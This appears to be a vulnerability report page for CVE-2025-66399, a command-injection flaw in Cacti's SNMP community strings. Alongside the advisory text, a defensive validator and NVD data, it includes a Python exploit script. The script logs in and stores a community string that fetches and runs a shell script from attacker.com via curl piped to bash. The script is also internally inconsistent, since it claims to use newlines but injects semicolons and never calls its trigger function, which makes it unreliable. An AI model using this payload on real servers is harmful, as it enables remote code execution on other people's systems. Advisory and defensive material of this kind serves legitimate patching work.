Security Vulnerability Report
CVE-2025-66399 CVSS 8.8 HIGH

CVE-2025-66399

Published: 2025-12-02 18:15:50
Last Modified: 2025-12-05 18:57:12

Description

Cacti is an open source performance and fault management framework. Prior to 1.2.29, there is an input-validation flaw in the SNMP device configuration functionality. An authenticated Cacti user can supply crafted SNMP community strings containing control characters (including newlines) that are accepted, stored verbatim in the database, and later embedded into backend SNMP operations. In environments where downstream SNMP tooling or wrappers interpret newline-separated tokens as command boundaries, this can lead to unintended command execution with the privileges of the Cacti process. This vulnerability is fixed in 1.2.29.
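A defensive check for the flaw described above, as an added example (not Cacti's actual patch and not code from this page): it rejects community strings containing control characters at input time and audits values that were already stored. The function names, the length limit and the sample rows are assumptions constructed for illustration.

```python
import unicodedata

MAX_LEN = 64  # assumed limit for this example, not a Cacti constant

# Unicode categories treated as unsafe: control, format, line and paragraph separators
UNSAFE_CATEGORIES = ("Cc", "Cf", "Zl", "Zp")


def control_chars(value):
    """Return the code points (as U+XXXX) of unsafe characters found in value."""
    return [f"U+{ord(ch):04X}" for ch in value
            if unicodedata.category(ch) in UNSAFE_CATEGORIES]


def validate_community(value):
    """Reject rather than strip, so a crafted value is never silently 'repaired' and stored."""
    if not value or len(value) > MAX_LEN:
        raise ValueError("community string length out of range")
    found = control_chars(value)
    if found:
        raise ValueError("control characters not allowed: " + ", ".join(found))
    return value


# Constructed sample rows: (device id, description, stored snmp_community)
SAMPLE_ROWS = [
    (1, "core-switch", "public"),
    (2, "edge-router", "public\nsecond-line"),
    (3, "lab-ups", "monitor\r\x00"),
]


def audit_stored(rows):
    """Flag devices whose stored community string would fail validation today."""
    findings = []
    for dev_id, description, community in rows:
        found = control_chars(community)
        if found:
            findings.append((dev_id, description, found))
    return findings


if __name__ == "__main__":
    for dev_id, description, found in audit_stored(SAMPLE_ROWS):
        print(f"device {dev_id} ({description}): unsafe characters {found}")
```

Running the audit against stored device records after upgrading shows whether a crafted value was saved while the vulnerable version was in use.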

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* - VULNERABLE
Cacti < 1.2.29

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66399 PoC - Cacti SNMP Community String Command Injection
# This PoC demonstrates injecting commands via SNMP community strings
import requests
import json

# Configuration
CACTI_URL = "http://target.com/cacti"
USERNAME = "attacker"
PASSWORD = "password123"
TARGET_HOST = "http://attacker.com/"


def login(session):
    """Authenticate to Cacti"""
    login_url = f"{CACTI_URL}/index.php"
    data = {
        "action": "login",
        "login_username": USERNAME,
        "login_password": PASSWORD
    }
    response = session.post(login_url, data=data)
    return "cacti_session" in session.cookies


def inject_snmp_community(session):
    """Inject malicious SNMP community string with command injection"""
    # Construct malicious community string with newline for command injection
    malicious_community = f"public;curl {TARGET_HOST}/shell.sh|bash;#"
    devices_url = f"{CACTI_URL}/host.php"
    data = {
        "action": "save",
        "host_template_id": "1",
        "description": "Malicious Device",
        "hostname": "192.168.1.1",
        "snmp_community": malicious_community,
        "snmp_version": "2",
        "method": "save"
    }
    response = session.post(devices_url, data=data)
    return response.status_code == 200


def trigger_execution(session, device_id):
    """Trigger SNMP operation to execute injected command"""
    reindex_url = f"{CACTI_URL}/host.php"
    data = {
        "action": "reindex",
        "host_id": device_id
    }
    response = session.post(reindex_url, data=data)
    return response


def main():
    session = requests.Session()
    if not login(session):
        print("[-] Authentication failed")
        return
    print("[+] Successfully authenticated")
    if inject_snmp_community(session):
        print("[+] Malicious SNMP community string injected")
        print("[+] Wait for scheduled SNMP reindex task to trigger command execution")
    else:
        print("[-] Failed to inject community string")


if __name__ == "__main__":
    main()
```

References

https://github.com/Cacti/cacti/security/advisories/GHSA-c7rr-2h93-7gjf (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66399", "sourceIdentifier": "[email protected]", "published": "2025-12-02T18:15:49.540", "lastModified": "2025-12-05T18:57:11.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cacti is an open source performance and fault management framework. Prior to 1.2.29, there is an input-validation flaw in the SNMP device configuration functionality. An authenticated Cacti user can supply crafted SNMP community strings containing control characters (including newlines) that are accepted, stored verbatim in the database, and later embedded into backend SNMP operations. In environments where downstream SNMP tooling or wrappers interpret newline-separated tokens as command boundaries, this can lead to unintended command execution with the privileges of the Cacti process. This vulnerability is fixed in 1.2.29."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.29", "matchCriteriaId": "C0B80A90-97E0-49C0-A780-695E17B0568C"}]}]}], "references": [{"url": "https://github.com/Cacti/cacti/security/advisories/GHSA-c7rr-2h93-7gjf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}